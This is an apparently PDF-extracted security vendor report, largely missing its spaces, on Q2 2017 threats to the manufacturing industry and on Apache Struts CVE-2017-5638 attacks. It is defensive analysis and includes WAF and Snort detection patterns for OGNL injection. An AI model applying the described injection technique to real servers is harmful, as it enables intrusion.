Flash Player

Adobe AIR

Acrobat Reader

98.40%

1.30%

0.10%

14

2

Air SDK 0.10% 1

5

Acrobat 0.10% 4

Figure 16. Industries targeted via the top 10 CVEs.



Global Threat Visibility: Final ThoughtsNTTSecurityanalystsobservedasmalloverallincreaseindetectionsinQ2’17.Thefirsthalfof2017includedaheavyfocusonmanufacturingandthedistributionofmalwarethroughlargephishingcampaigns.WebapplicationsbasedonPHPcontinuetobeapopulartargetbyhackerswhounderstandthelackofsecurityimplementationsintopluginsandapplications.Asbrute-forcingcontinuestobepopular,NTTSecurityanalyzedseveralbrute-forcingattemptsagainstpublicMSSQLserverswithdefaultportsandout-of-dateversions.ThisshouldbeanimportantremindertonotallowRDBMSanddatabasestobepublic-facing,asattackersfocusmoreonthemonetizationofransom-styleattacks.AsAdobeFlashPlayerremainstoberiddledwithRCEvulnerabilitiesbeingtargetedbycybercriminals,itiscrucialtounderstanddrive-byandweb-basedattackscontinuetobeprevalent;targetingnotonlyunpatchedservers,butcommonwebvisitorsintheorganization,includingtheorganization’semployeesandclients.WithrecentattacksinvolvingaPetyavariant,WannaCry,Trickbotandothers,NTTSecuritypredictscybercriminalswillcontinuetosupporttheireffortswithphishingcampaignsthroughout2017todeliverevermorerobustmalware.Afteranalyzingattacksfromhostsinseveralcountries,itisevidentcompromisedhostsincountrieswhichtypicallyflyundertheradar–suchastheNetherlands–arecomingbackintothespotlight.NTTSecurityexpectsthistrendtocontinueasthesecountriesbuildtheirinfrastructure,whichcouldbecomecompromisedandleveragedinfuturecyberattacks.

NTTSecurityrecommendsthefollowingtohelpmitigatethethreatsdiscussedabove:

• Conductregularvulnerabilityscansandpenetrationtestingto identifyvulnerabilities.

• Alwaystakeadefense-in-depth(DiD)approachtosecurity controls,includingdefininginternalsegmentation andsegregation,whichincreasesthecomplexityfor cybercriminalstobecomemoresuccessfulduringattacks.

• EstablishanIncidentResponseTeamsupportedbyformal anddocumentedprocessesandprocedures.

• Enforceeffectivepatchmanagementthroughbothautomated andmanualprocessestoensurenecessarysoftware andhardwarepatchesareapplied,mitigatingsuccessful exploitationattempts.

• Considerwhitelistingapprovedapplications.

• Ensurecriticaldata,information,operatingsystems, applications,tools,andconfigurationfilesarebackedupand storedoffline.Processesandprocedurestoreverttobackups duringanincidentshouldbedocumentedandtestedona routine basis .


threatsindustriesacrosstheglobefacedaily,particularlythreatstothemanufacturingindustry,whicharebecomingprogressivelymoredifficulttodefendagainst,astechnologyandconnectivitycontinuetoincreaseatanastoundingrate.

Theindustryitselfcoversanincrediblybroadrangeoforganizations:fabricsandtextiles,foodproducts,constructionmaterials,pharmaceuticals,plastics,metals,computercomponents,automobiles,justtonameafew.Thereasonsforanygivensegmenttobetargetedareinnumerable–fromintellectualproperty(IP)thefttoespionagetousingafirmasasteppingstoneforfurthertargeting(forinstance,ifatargetedmanufacturingfirmisinthesupplychainofanotherfirmorgovernmentorganization).

Whatotherfactorsmakethemanufacturingindustrymoresusceptibletobeingtargetedbyhackers,cybercriminalsandotherthreatactors?Istheindustryfundamentallymorevulnerable?

What Makes Manufacturing an Attractive Target?RebeccaTaylor,SeniorVicePresidentforNCMS,says,“Mostmanufacturingsystemstodayweremadetobeproductive– theywerenotmadetobesecure.Everymanufacturerisatrisk– itisn’tamatterofiftheywillbetargeted,it’samatterofwhen.”

Intellectualpropertyisatapremium,andinamarketwherefractionsofmarketsharescanmeanmillions–orbillions–ofdollars,competitionisfierce.Industrialcontrolsystems(ICS)areoftenleftunguarded,andworseyet,theyareoftenbuiltwithlittletonothoughtforsecurity,sometimesmakingprotectionofthedeviceitselfimpractical.Thereisalackofinvestmentincybersecurity,asfundsarebeingspentupgradingsystemstobemoreproductiveormoreefficient.Infact,almosthalfoftop

AttackProfileoftheManufacturingIndustry

Thecostofcybercrimetobusinessesisexpectedtoreach $6trillionannuallyby20217.Globally,themanufacturingindustryisnowoneofthemostfrequentlyattackedindustries,secondonlytohealthcare,makingpotentiallossesinthisindustrycatastrophic.

Themanufacturingindustryisincreasinglybeingtargeted,asthreatactorsperceivetheprospectivegainsinattackingnetworksinthisindustry.PertheNationalCenterforManufacturingSciences(NCMS),33percentofallcyberattacksin2015wereagainstthemanufacturingsector.In2016,39percentofmanufacturingfirmssaidthey’dbeenbreached,withbreachescostingbetween$1-10million.Thistrendwillcertainlycontinue.

TargetingofthemanufacturingindustrywasalsoseeninNTTSecurityclientdataoverthelastyear.ThemostrecentNTTSecurity Global Threat Intelligence Report (GTIR)8showedthemanufacturingindustrywasheavilytargetedacrossclientnetworksduring2016,appearinginthetopthreetargetedindustriesinfiveofthesixgeographicregionsevaluated.Nootherindustryappearedinthetopthreemorethantwice.ManufacturingwasthemostattackedsectorinAfricaandtheAmericas,andthesecondmostattackedsectorinAsia(32percent,trailingonlyfinance),sogeographicareaswithsignificantmanufacturingcapabilitiesareseeingtheimpactofthisfocus.

Thistrendcontinuesinto2017.Infact,themanufacturingindustrywasthemostheavilytargetedindustryacrossNTTSecurityclientsduringQ2’17.

Globalestimates,acrossallindustries,oflossesinthetrillionsofdollarsoverthenextfiveyearsarenotsurprisinggiventhe

“Mostmanufacturingsystemstodayweremadetobeproductive—theywerenotmadetobesecure.Everymanufacturerisatrisk—itisn’tamatterofiftheywillbetargeted,it’samatterofwhen.”Rebecca Taylor, Senior Vice President for NCMS

7 http://cybersecurityventures.com/cybersecurity-market-report/8 https://www.nttsecurity.com/en/what-we-think/gtir-2017/



executivesinmanufacturingfirmsneitherfeelconfidentintheirtechnologytoprotecttheirnetworks,nordotheyfeeltheyhaveadequatefunding.

And,connectivityisincreasing.FromInternetofThings(IoT)andOperationalTechnology(OT)devicestoroboticstohuman-machineinterfacing(HMI),thisconnectivityisimprovingautomation,and,subsequently,cuttingcostsandincreasingproductivity.Unfortunately,thisincreasestheattacksurface.Manyindustriesincorrectlybelieve“itcan’thappentous.Wedon’thavevastamountsofconsumerdata,healthrecords,orcreditcardinformation.Wejustmake‘widgets.’”

Whiletheabovelineofthoughtmaybethefirstinclination,rememberthat,yearafteryear,themanufacturingindustry hasconsistentlybeenoneofthetopmostfrequently targetedindustries.

Considertheconsequencesofabreach:fewer‘widgets’tosell,competitorsgaininginsightintoyourwidgetproductionprocessesorproprietarywidgetinnovations,cybercriminalsdemandingaransomtodecryptthissameinformationorforeignnationsusingthissameinformationtoundercutamajorbid.Thiscouldtranslateintodecreasedproductivity,increasednetworkdowntime,and,ultimately,adecreaseinprofits.Howmuchdecreasein“X”canyourorganizationafford?

Thereisnoquestionthatcybercriminalsarelookingtocapitalizeonthishighlyattackableindustry.Othersmaywanttodamageafirm’sbrandandreputation,perhapstobenefittheirown.

Butcybercriminalsandcompetitorsaren’taloneintargetingthoseinthisindustry,asnation-stateactorsaredoingthesame.

PerChina’snewestFiveYearPlan(FYP),theChinesegovernmentcontinuestoprioritizesignificanteffortswithinthemanufacturingsectorthrough2020.InearlyDecember2016,ChinareleaseditsnewestFYPforintelligentmanufacturinginattemptstoincreaseitscompetitivenessinthe“factoryoftheworld,”along-termstrategytogeneratenewgrowthinthecountry’smanufacturingsector.

Additionally,“MadeinChina2025”targetstenkeysegmentsoftheindustryforadditionalgovernmentsupport:

• Newenergyvehicles

• Next-generationinformationtechnology(IT)

• Biotechnology

• Newmaterials

• Aerospace

• Oceanengineeringandhigh-techships

• Railway

• Robotics

• Powerequipment

• Agriculturalmachinery

ChinesecyberactorshaveattackedindustrieslistedintheFYPinthepast,primarilytoaccrueIPandotherdata.Thosesegmentsidentifiedasprioritiesforresearchanddevelopmentcanexpectcontinuedinterestfromtheseactors.BasedonexperiencewithattacksfromChinaoverthepastseveralyears,NTTSecurityexpectsthesetypesofattackstocontinueinallindustries,butparticularlyinmanufacturing.

Trends – and Associated Emerging Risks – in the Manufacturing Industry

Inthisrapidlychangingindustry,atoppriorityiscuttingoperationalcosts,whilemanufacturersleveragetechnologytoensurefuturegrowth.

Manufacturingorganizationshavetakenonamuchmorewidely-distributedenvironmentandinfrastructure.Increasingnumbersofusersanddeviceswillgreatlyincreasethenumberofavenuesintoyournetworkfromthreatactors–fromcybercriminalstonation-stateactors.

…yearafteryear,themanufacturing

industryhasconsistently been oneofthetop mostfrequently

targetedindustries.

9 http://www.eweek.com/security/deloitte-survey-finds-manufacturers-highly-vulnerable-to-cyber-threats10 https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/609186/Cyber_Security_Breaches_Survey_2017_main_report_



Theindustryhasbecomemorevulnerableduetoitsfocusontechnologicaladvances,whilenotinvestingasheavilyinthecybersecuritybudgetasinotherpriorities.Thisisnottosaythattheindustryisignoringsecurity,ratherthattheinvestmentintechnologyandenablingserviceshastakenapriority.Asaresult,cybersecuritymayhavetakenabackseat.Thisholdstruenotonlyinthemanufacturingindustry,butinmanysectors.Infact,theCyberSecurityBreachesSurvey201710,publishedearlierthisyearsuggestsmanufacturersarelesslikelythanmanyotherindustriestoratecybersecurityasaseriouspriority.Just31percentoffirmsinthemanufacturingindustryregardedcybersecurity as a high priority . In contrast, 61 percent in the financialsectorheldcybersecurityasahighpriority,alongwith49percentinboththehealthcareandeducationsectors.Tosomeextent,thisisunderstandable.Anyonecanlookatthedataandthinkthat“personalhealthcareinformation”and“cardholderdata”aremoresensitivethan“widgets,”right?

Operational Technology and “Smart Factories” Perhapsthemostinfluentialofalltrendsresultsinoneofthegreatestemergingcyberthreatstothemanufacturingindustry:smartfactories.Hopingtoaddefficiency,productivity,qualityofproductsandflexibilitytotheprocess,connected–or“smart”–factoriesareexpectedtoadd$500billiontotheglobaleconomyinthenextfiveyears,addingyetanotheravenueforthreatactorstotargetthemanufacturingindustry.

Thisconnectivityisexpectedtodrivea27percentincreaseinefficiencyduringthattimeframe,andbytheendof2022,manufacturersexpectthat21percent11ofallfactorieswillbefullyconnected.Butalltheseadditionaltools,devices,androbotsareredefiningtheattacksurfaceinthemanufacturingindustry.Despitethebenefitsofconnecteddevices,thiscreatesanenvironmentwithacontinuallybroadeningattacklandscapeduetoendpointexpansion.Asthesedevicesmultiply,theycanbecomecrucialaccesspointsforanattackertoinfiltrateanetwork,orbecomepawnsinabotnetorevenbevictimsofransomwarethemselves.Simplyput,themoresystemsyouhave,themorelikelyitisthatanattackerisgoingtofindsomething“interesting”inyourenvironment.12

TheriseoftheOTalsoplaysacriticalroleinintegratingmanufacturingprocesses,improvingproductivityandefficiency,solongasthesetechnologiesareproperlysecured.Integrationeffortsvarywidelybyindustrysegment.Forexample,67percentofindustrialmanufacturingand62percentofaerospaceanddefenseorganizationshavebeguntoimplementsmart

factoryinitiatives,whileonly37percentofpharmaceuticalmanufacturersareleveragingdigitaltechnologies.

Industry 4.0: Automation, Connectivity and ServitizationManufacturersareamidoneofthemostexcitingtechnologicalchangesinhistory,knownasthefourthindustrialrevolution,orIndustry4.0.Thecapabilities–andchallenges–representedbyconnectivityviaIoTandOT,roboticsandautomationoffermanufacturerstheopportunitytooperatemoreefficientlyandeffectively,developingnewbusinessprocesses,suchasservitization,(essentially,theevolutionofanorganization'scapabilitiestobettercreatemutualvaluethroughashiftfromsellingproducttosellingProduct-ServiceSystems),alltakingcustomerservicetoanewlevel.

AlthoughsomeU.S.manufacturersaremovingmoreslowlyinadoptingIndustry4.0,75percent13ofrespondentsina2017reportfeeltheyhavesufficientunderstandingoftheissuesandimplicationsofIndustry4.0anditsthreatsandopportunities.Inaddition,asignificantproportionofrespondentswereeitherbeginningtomovetoIndustry4.0(23%),orwereplanningtodoso(62%).About66percenthadmadefurtherinvestmentsinautomationinthepast12months,andmosthadacknowledgedanunderstandingofservitization.

New Technologies and Reuse of Old SoftwareAsinmanyindustries,andasnotedearlier,manufacturinghashistoricallybeengearedtowardmeetingitsbusinessobjectivesratherthanaquestforgreatersecurity.Anothersymptomofthismentalityisthatoldsoftwareisreused(efficiency!),potentiallypropagatingexistingsecurityholes.

21%ofmanufacturershavesufferedalossofintellectualpropertyfromcyberattacks.

11 http://enterpriseiotinsights.com/20170601/smart-factory/20170601smart-factorysmart-factories-economic-value-tag2312 http://enterpriseiotinsights.com/20170601/smart-factory/20170601smart-factorysmart-factories-economic-value-tag2313 http://www.nass.org.uk/Publications/Publication4261/Annual-Manufacturing-Report-2017.pdf



Inaddition,organizationsareemployingnewtechnologies,potentiallyexposingfirmstorisksforwhichtheymaynotyethavefullyconsideredtheimpactontheirsecurityposture.Forexample,softwaremaybebuiltusingopen-sourcecodealreadyinexistenceonsharedsites,possiblyincludingsomequestionablesources,potentiallyputtinganorganizationindangerifthesehostsaren’tsegmentedfromtherestofthenetwork.Whilemostofthissharedcodeissafe,notallofitis.Withhardcodedbackdoorswrittenintosoftware,vulnerabilityproof-of-conceptsininsecuresoftwarecode,andmoreavailableonline, theriskthatanattackerwillusethistohisadvantageincreases.

Asmentionedatthebeginningofthissection,newtechnologiesareincreasingtheattacksurface,andproperlysecuringthesetechnologiesisessentialtoreducingtherisktoyourorganization.

Cyber Espionage and Theft of IPTwenty-onepercentofmanufacturershavesufferedalossofintellectualpropertyfromcyberattacks.

Inits2016ManufacturingReport,Sikich14citedIPtheftastheprimarymotivebehindanattackonamanufacturingorganization.Tofurtherdrivethepointhome,theFBIestimatesthatIPworth$400billionisstolenfromU.Sfirmsalone,eachyear.

Cyberespionageisnowconsideredtobethemostcommontypeofattackinthisindustry.Alargepartofthisisduetotheexplosionofproprietarydataandresearch.

Thesetypesofattackscantakemanyforms.Mostcommonly,though,attacksareattributedtocompetitorstryingtoobtainIP,whetherthatIPbeproprietarymanufacturingprocesses,patentsordesigns.Sadly,manyinternationalcompetitorsarenothighlyethical,viewingcyberespionageasanothermeanstoreachtheirownobjectives.

Nation-stateactorsareheavilyimmersedincyberespionageactivities,withChinadominatingthecyberespionagespaceoverthepasttwodecades.Despitethecybertreatysignedin2015betweentheU.S.andChina,thethreatneverthelesscontinues,particularlyinthemanufacturingindustry.

Cyberespionageisrampantandisnotconnectedonlytonation-stateactors.Inthisglobaleconomy,goodscanbeproducedvirtuallyanywhere.Ifacompetitorcanstealtheresearchanddevelopmentbehindthosegoods,thenanunethicalcompany,nationorcybercriminalwillbeabletoundercutandwinonprice.Itonlycoststheunsecuredmanufacturingfirm,anditscustomers,money.

Theseattacksby“cyber-spies,”andanysubsequentbreaches,particularlythosebackedbynation-states,werebehindasignificantnumberofbreachesexperiencedbymanufacturingfirmslastyear.Theseattacksaretypicallyhighlytargetedandwellthoughtout,targetingspecificdata.Over90percentofthematerialstolenhadbeencategorizedas“secret”or“proprietary,”indicatingthattheattackerssuccessfullybypassedsecuritycontrolscurrentlyinplace,orsimplythatthisisthetypeofdatathreatactorsareseeking.Thatsaid,manystate-backedthreatactorshaveaccesstozero-daysorothersophisticatedtools.Tocombatthesethreats,manufacturersneedtoensuretheyhave,attheveryleast,bestpracticesemployed.Pleasenotethatthesesecurityshortfallsarenotspecificonlytothisindustry,butseemtohappenonamuchbroader,globalscale.

Despitetheseemergingthreats,the2017CybersecurityBreachesSurveysuggeststhatmanufacturersarefarlesslikelythanmanyothersectorsoftheeconomytoratecybersecurityasaseriouspriorityfortheirorganizations;itmaybeworthrestatingthatjust31percentofmanufacturersregardedcybersecurityasahighpriority.Hopefullythistrendwillreverseitself,astheindustryfaceshugechangesinthecomingyears,requiringtheutmostinnetworksecurityifmanufacturingorganizationswishtoremaincompetitive.

RecommendationsAparadigmshiftinmindsetisessentialinallsegmentsofthemanufacturingindustryandinallpartsoftheprocess.Tosuccessfullyfacecurrentandfuturethreats,cybersecuritymustbebuiltintoallaspectsofanorganization’snetworksandoperationsratherthanretrofittedasanafterthought,particularlyasIndustry4.0isimplemented.Itshouldbeclearthatwithoutthepropermitigationeffortsinplace,allprocessesareatrisk,impactingthebottomline.

ormoreofmaterialstolenby “cyber-spies”hasbeenclassified as “secret” or “proprietary .”

90%

14 https://www.leadingedgealliance.com/thought_leadership/sikich_manufacturing_report_2016r.pdf



Anorganizationgreatlydecreasesthetimeittakestobouncebackfromanattackiftheparadigmshifthasalreadyoccurred.Giventhecurrentstateofcybersecurityinthemanufacturingindustry,wheredefendersareclearlyatadisadvantage,attacksmaybeallbutinevitable.Witharenewedmindset,organizationsinthemanufacturingsectorcanbecomebetterequippedandmorepreparedtoreactto,andrecoverfrom,anattack.Thisistrueforanyorganization,notjustthoseinthemanufacturingindustry.

Threatactorsandcybercriminalswillcontinuetotargetvictimsintwoareas:organizationswithhighlyvaluabledata,andorganizationswithpoorsecuritypractices.Themanufacturingindustryisoneofthoseindustrieswhichhashistoricallyfallenintobothcategories.Likeanyorganization,manufacturingorganizationscantakeactionsonnetwork/program/software/platformlevelstooptimizesecurityandreduceyourriskofdatacompromise.Iftheserecommendationscanbesuccessfullyimplemented,theenvironmentcanbemademoresecureinapractical,efficientmanner.

NTTSecurityrecommendsmanufacturingorganizationsconsiderthefollowingpreventativeandmitigationstrategies:

• Educateusersonidentifyingandavoidingphishingemails– particularlysinceemployeesarethemostoftentargeted,and maybethefirst–oronly–lineofdefense.

• Ensurecomputers,networkandotherinternet-connected devices,particularlyindustrialcontrolsystems,arerunning themostcurrentversionsofoperatingsystemsandsoftware. Pleasenotethatthemostcurrentsoftwareversionsare typicallythemostsecure,butthisisnotalwaysthecase.

• Inadditiontooutsideactors,don’tforgettosecureagainstthe rogueinsider–someonetrustedwithinyourorganization, whoperhapshas“thekeystothekingdom.”

• Enforce“leastprivilege”–varythelevelofindividualaccess, grantedbasedonspecificuserneedsandscenarios.

• Toeverypracticalextent,isolatesensitivesystemsand networkfunctions.Groupassociatedsensitivefunctionsonto protectednetworkswheneverpossible,toincludesegmenting ICSfromothernetworkfunctions.

• Industrialnetworksareoftennotwellsegmentedbetween IT/OT,soaninfectionintheformercaneasilyspreadto the latter .

• LetmalwaresuchasWannaCryserveasarecentlesson: althoughthemanufacturingindustryseemedalmostimmune

toWannaCry,manyWindowsmachinesinsideICS environmentsarenotfullypatched,andareoftenrunning outdated,unsupportedversions.

Threats to Manufacturing: Final ThoughtsThemanufacturingindustrywillcontinuetomaturethroughautomation,servitizationandIndustry4.0.NTTSecurityfullyexpectsattacksinthemanufacturingindustrytocontinue.Astheimplementationoftechnologyincreasesandattackingbecomesmoreprofitable,cybercriminalsatalllevelswillcontinuetoviewtheindustryasincrediblylucrative,vulnerable,andattackable.Securingallfacetsofyourorganizationisessential.Justoneopeningcreatesanopportunityforthreatactorstogain,andmaintain,afootholdinyournetwork.

ExpectIoT,OTandautomateddevicestocontinueplayinganincreasingroleasmanufacturingorganizationsconsiderhowtohardentheirsecurityinfrastructuretosupportIndustry4.0implementationefforts.Manufacturingorganizationsmustmaximizetheeffectivenessofsecuritycontrolstoprotectthesetechnologiesastheyareimplemented.

Asthenumberofendpointdevicesincreases,theattacksurfacewillalsoincrease,puttingfurtherstrainsonalreadyburdenednetworkinfrastructure.Thiswillleavemanymanufacturingfirmsstrivingtofindwaystosimplifyandstreamlinecybersecuritycontrols.

Analystsanticipateseeingablendingofattackvectors,asthecapabilityandmotivationofthreatactorsincreaseandadapttotheever-changinglandscape.

Thisallmeansthatsomehow,manufacturingorganizationsneedtoforcethemselvestoprioritizesecurityaspartoftheirevolution.Attackershaveidentifiedmanufacturingfirmsasvaluabletargets,soitbecomesincumbentontheindustrytomakethemselveslessattractivetargets.

References:http://www.eweek.com/security/deloitte-survey-finds-manufacturers-highly-vulnerable-to-cyber-threats

http://www.themanufacturer.com/reports-whitepapers/annual-manufacturing-report-2017/

http://www.nass.org.uk/Publications/Publication4261/Annual-Manufacturing-Report-2017.pdf


1

1 Jakarta Multipart Request

if the messageincludes OGNL

expression

Struts Basic flows for both filters Jakarta and Jakarta Stream are similar (orange arrows)

2

3

Blue arrows:Flow of S2-045

White arrow:Flow of S2-046

ognl

2

3

Commons FileUpload

processUpload

buildErrorMessage

StrutsPrepareAndExecuteFilter

MultiPartRequestWrapper

LocalizedTextUtil

parse

ApacheCVE-2017-5638StrutsitsStuff:A Quick Look into Apache Struts

IntroductionPetya,WannaCryandtheSMBvulnerabilitiesassociatedwithMS17-010dominatedmuchofthenewsoverthelasthalfofQ2‘17,butwerebynomeanstheonlythreatsorganizationsfaced.NTTSecurityGTICandNTTComputerEmergencyResponseTeam(CERT)collaboratedforacloserlookatoneofthosethreats,attacksseekingtoexploitvulnerabilitiesinApacheStruts.

TherewassomebuzzaroundApacheStruts(CVE-2017-5638)afterApachereleaseditssecurityadvisories(S2-045andS2-046)inMarch2017.Atthetimeofrelease,thevulnerabilities,whichcouldallowremotecodeexecution(RCE),wereassignedaCVSSof10,themostcritical.

ThebiggernewsaboutStrutsisthatattackersquicklyjumpedontheStrutsbandwagon,andhaveremainedthere.ApacheStrutsexploitattemptsquicklyjumpedintothetopfiveattacksmostcommonlydetectedinclientenvironments,andhaveremainedinthetopseventhroughJune2017.

Figure 18. Struts attack vector flow

So,nooneshouldreallybesurprisedthatattackersaretakingadvantageoftheStrutsvulnerabilities–buthowbadare they really?

What is a Struts Attack?TheRCEvulnerabilitiesarebasedonStruts’useofObjectGraphNavigationLanguage(OGNL)asatemplatelanguage.AttackersexploitbothS2-045andS2-046bycraftingamalformedHTTPrequest,alongwithanOGNLpayload,whichforcesStrutstocreateanexception.OGNLincludessecurityrestrictionsoncreatingandaccessinganobject,soattacksmustbypassthoselimitations.

AttackvectorsforS2-045andS2-046aredifferent,soerrorsoccurindifferentphasesofaprocess.

• S2-045:HTTPContentTypeheaderfield

• S2-046:HTTPContentDispositionheaderfieldand Content-Lengthfield

Theprocessflowrelatedtoeachattackvectorisshownin Figure 18 .



Struts Attacks TimelinesNTTSecurityresearchersandNTT-CERTbothtrackedtheStrutsannouncementandattacksonaglobalscale.ThetimelineinFigure 19summarizesactivityoverthefirstseveraldays. Attackerstendtoexploitpublicvulnerabilitiesquickly,takingadvantageofexploitsbeforesecurityprofessionalscanfullyevaluatethevulnerabilitiesandbeforepatchescanbeapplied.ThespeedwithwhichApacheStrutsattacks(andothers)wereweaponizedhelpshighlighttheimportanceofeffectivevulnerabilitymanagement.Organizationsmustbeabletoidentify,classify,remediate,mitigateandtrackvulnerabilitiesintheirenvironmentstominimizetheimpactnewvulnerabilitiescanhave,andtoreactinaneffectivemanner.

NTTSecurityandNTTGroupresourcesbeganinvestigatingApacheStrutswithinhoursofthereleaseofApache’ssecurityadvisory.Aresearcherreleasedproof-of-concept(PoC)codetoexploit

Figure 19. Struts timeline

ApachereleasesS2-045

ApachereleasesPatchInvestigation at Apache

March 7 March 8 March 9 March 10 March 11

Investigation at NTT-CERT

Investigation at JPCERT

Investigation at NTT Security

POC CodeReleased

AdditionalMitigationDefined

WAF andSnortSignatureRelease

Applied WAF Signatures and Mitigation in NTT Group Applied patch in NTT Group

Monitoring Enabled by NTT Security

Attacks Detected by NTT Security

thevulnerabilityonMarch8andwebapplicationfirewall(WAF)signaturesweredevelopedsoonafter.NTTSecuritydetectedwhatappearedtobemaliciousattackactivitywithin24hoursofthereleaseofthePoCcode.NTTSecurityandNTT-CERTanalystsevaluatedtheeffectivenessoftheApachepatch,aswellasWAFsignaturesinmitigatingtheimpactoftheobservedattacks.

Inthisprocess,thegoalofNTT-CERT’sanalysiswastoprovidecurrentinformationforinternalNTTGroupresources,includingNTTSecurityandsupportingoperatingcompanies.ThegoalofNTTSecurityanalysiswastoprovidecurrentinformationforNTTSecurityoperationsandclients. EarlyonMarch9,NTTSecuritywasalreadydetectingsignificantlevelsofexploitattempts.AsshowninFigure 20, NTT Security detectedconsistentlevelsofattacksforseveraldaysbeforethesharpincreaseinattacktrafficonMarch17,whichisalmostcompletelyattributabletoactivityfromChina-basedsources.


Targeted Industries

Education Technology Finance Health Care Government Retail BusinessServices

Entertainment Energy Media

0%

10%

20%

30%

40%

50%

U.S. Japan

Day of Date (March 2017)

3/9

3/10

3/11

3/12

3/13

3/14

3/15

3/16

3/17

3/18

-27%

-46%

14%

42%

44% 11

% 11%

102%

500

1000

1500

2000

2500 CVE-2017-5638 Changes in Attack Volume


Figure 20. Struts attack log counts

Whileattacksoriginatedfrommanycountriesaroundtheworld,76percentofallattackstargetingApacheStrutsoriginatedfromIPaddressesinChina.

Observed AttacksSixty-ninepercentofattacksfromChinaattemptedtodisablelocalfirewallsandinstallmalwarefromremoteserversusingLinuxretrievalcommandssuchaswget.ThisoftenincludedattemptstopulldownLinux32-bitand64-bitmalwareoverPOPport110.MalwarenamesrangedfromUpTip60throughUpTip97.ThismalwarewasmostoftenhostedintheUnitedStates,ChinaorSouthKorea.

Insomeinstances,wgetwasusedbutdidnotpulldownanymaliciousbinary.Thesewerelikelyattemptstoidentifyvulnerableservers,potentiallytoretrieveadditionalbinariesforfutureattacks.

Struts TargetsResearchersspecificallyevaluateddetectionsinJapanandU.S.operations.Therewaslittleoverlapintheindustriestargetedineachregion.IntheU.S.,65percentofallStrutsdetectionswereidentifiedintheeducationandhealthcareindustries,whileinJapan,46percentofallStrutsattackswerereportedinthegovernmentsectoralone.DetectionsineachindustryinthedifferentgeographiesareshowninFigure 21 . Thefactthatattackerscontinuetotargetdifferentindustriesindifferentgeographicregionsshouldnotsurpriseanyone.While

Figure 21. Targeted industries in U.S. and Japan


Signature ID

SERVER-APACHE Apache Struts remote code execution attempt41819

41818 SERVER-APACHE Apache Struts remote code execution attempt

SERVER-APACHE Apache Struts remote code execution attempt41923

2024038 ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638)

ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M22024044

2024045 ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M3

Description

headercontent:"_memberAccess"; nocase; re2:"/\b_memberAccess\b/Hi";headercontent:"OgnlContext"; nocase;valuecontent:"OgnlContext"; nocase;headercontent:"MemberAccess"; nocase;valuecontent:"MemberAccess"; nocase;

Signature pattern: part="_memberAccess", rgxp="\b_memberAccess\b"Protocol(s): http,httpsField(s) for search: header

Signature pattern: part="OgnlContext"Protocol(s): http,httpsField(s) for search: header

Signature pattern: part="OgnlContext"Protocol(s): http,httpsField(s) for search: parameterSignature pattern: part="MemberAccess"Protocol(s): http,httpsField(s) for search: header, parameter

thebasicsofanApacheStrutsattackaresimilaracross allgeographies,themotivationsofattackerschange,asdothetargetswhichattackersineachregionfindinteresting.

Why Target Struts?Globally,Strutsseemsanunlikelytarget.ApacheStrutshasrelativelylowglobalmarketadoptionwhencomparedtoothercommonwebframeworks.Figure 2215showstherelativemarketshareofseveralwebframeworks. However,marketsharechangeswhenregionalimpactisconsidered.A2013surveycompletedinJapan16showedthatStrutshada17percentmarketshareinJapan,whichmayhavehelpedcontributetoelevatedlevelsofattacksin somemarkets.

NTTSecurityanticipatescybercriminalswillcontinuetargetingApacheStrutsinstallationsbecauseofthewideinstallationbase,thesimplicityoftheattack,andthefactthattheattackincludestheabilitytoexecutecoderemotely.


Market Share of Common Web Frameworks

% of Respondents

Web

Fra

mew

ork

0 10 20 30 40 50

Spring MVC

Spring Boot

JSF

We don't

Vaadin

Other

GWT

Play 2

Grails

Struts 2

Struts 1

Wicket

Dropwizard

Play 1

43%

29%

17%

29%

1%

5%

19%19%

17%

6%

13%

13%

4%

4%

3%

3%

3%

Figure 23. Snort Signatures.

Figure 25. Imperva SecureSphere.

Figure 24. F5 BIG IP.

Figure 22. Market share of common web frameworks

15 https://zeroturnaround.com/rebellabs/java-tools-and-technologies-landscape-2016/16 http://www.sbbit.jp/article/cont1/26911 (Please note that this article is only available in Japanese.)


Apache Struts MitigationCriminalscontinuetotargetApacheStrutsinstallations.Tohelpmitigatetheseattacks,organizationsshouldconsiderthefollowingactions:

• UpgradetoStrutsversions2.3.32orStruts2.5.10.1(orlater).

• ImplementaservletfilterwhichwillvalidateContent-Type andthrowawayrequestswithsuspiciousvaluesnotmatching multipart/form-data.

• Changetoadifferentmultipartparsersuchaspellorthe parserfromtheCommons-FileUploadLibrary17 .

Struts Signatures and RulesNTTGrouphasidentifiedthefollowingsignaturesandruleswhichmayhelpmitigateattacks.Whileotherdetectionsmaybeavailable,NTTGrouphasidentifiedthesesignaturesandrulesasparticularly reliable .

Apache Struts: SummaryAttacksagainstApacheStrutshavenotreachedthesamelevelofattentionasWannaCry,Petya,ormanyotherattacks,butattackershavemadeconsistentattemptstoexploitthevulnerabilitiesinApacheStrutssincethePoCcodewasreleased.ApacheStrutshasprobablynotreceivedthelevelofattentionitdeserved,giventhatithasbeena“top7”attackconsistentlysince its release .

Asistruewithmanycurrentvulnerabilities,thesinglemosteffectivemitigatingcontrolistopatchsystemsinyourenvironment,inthiscase,ApacheStruts.Thatsaid,don’texpectApacheStrutsattackstodisappearuntilalotmoreorganizationshavecompletedthatpatching.


17 http://commons.apache.org/proper/commons-fileupload/


Summary

Summary Witha24percentincreaseinoverallactivity,Q2’17wascharacterizedbyawiderblendofattackmethodscomparedtoQ4’16.AttacksobservedinQ2’17includedavarietyofwebapplicationattacks,attacksallowingforremotecodeexecution,andphishing-basedattacks.Withinthesephishingcampaigns,however,cybercriminalsappearedtohaveanarrowerfocus,astheirpreferredvectorwasleveragingPowerShellcommandsinVBAmacroswithinmaliciousattachments.

NTTresearchersalsonotedanuptickinreconnaissance–possiblyindicatingattackpreparationduringtheupcoming3rdand4thquarters.ThisisatrendNTTSecurityresearchershaveobservedinpreviousyears,includingduringQ3andQ4’16,whenreconactivitydeclined.Thereisastronglikelihoodthatthistrendwillcontinueduringthelasttwoquartersof2017aswell,asattackersagainshifttomoretargetedattacksastheydeterminetheirtargets’vulnerabilities.

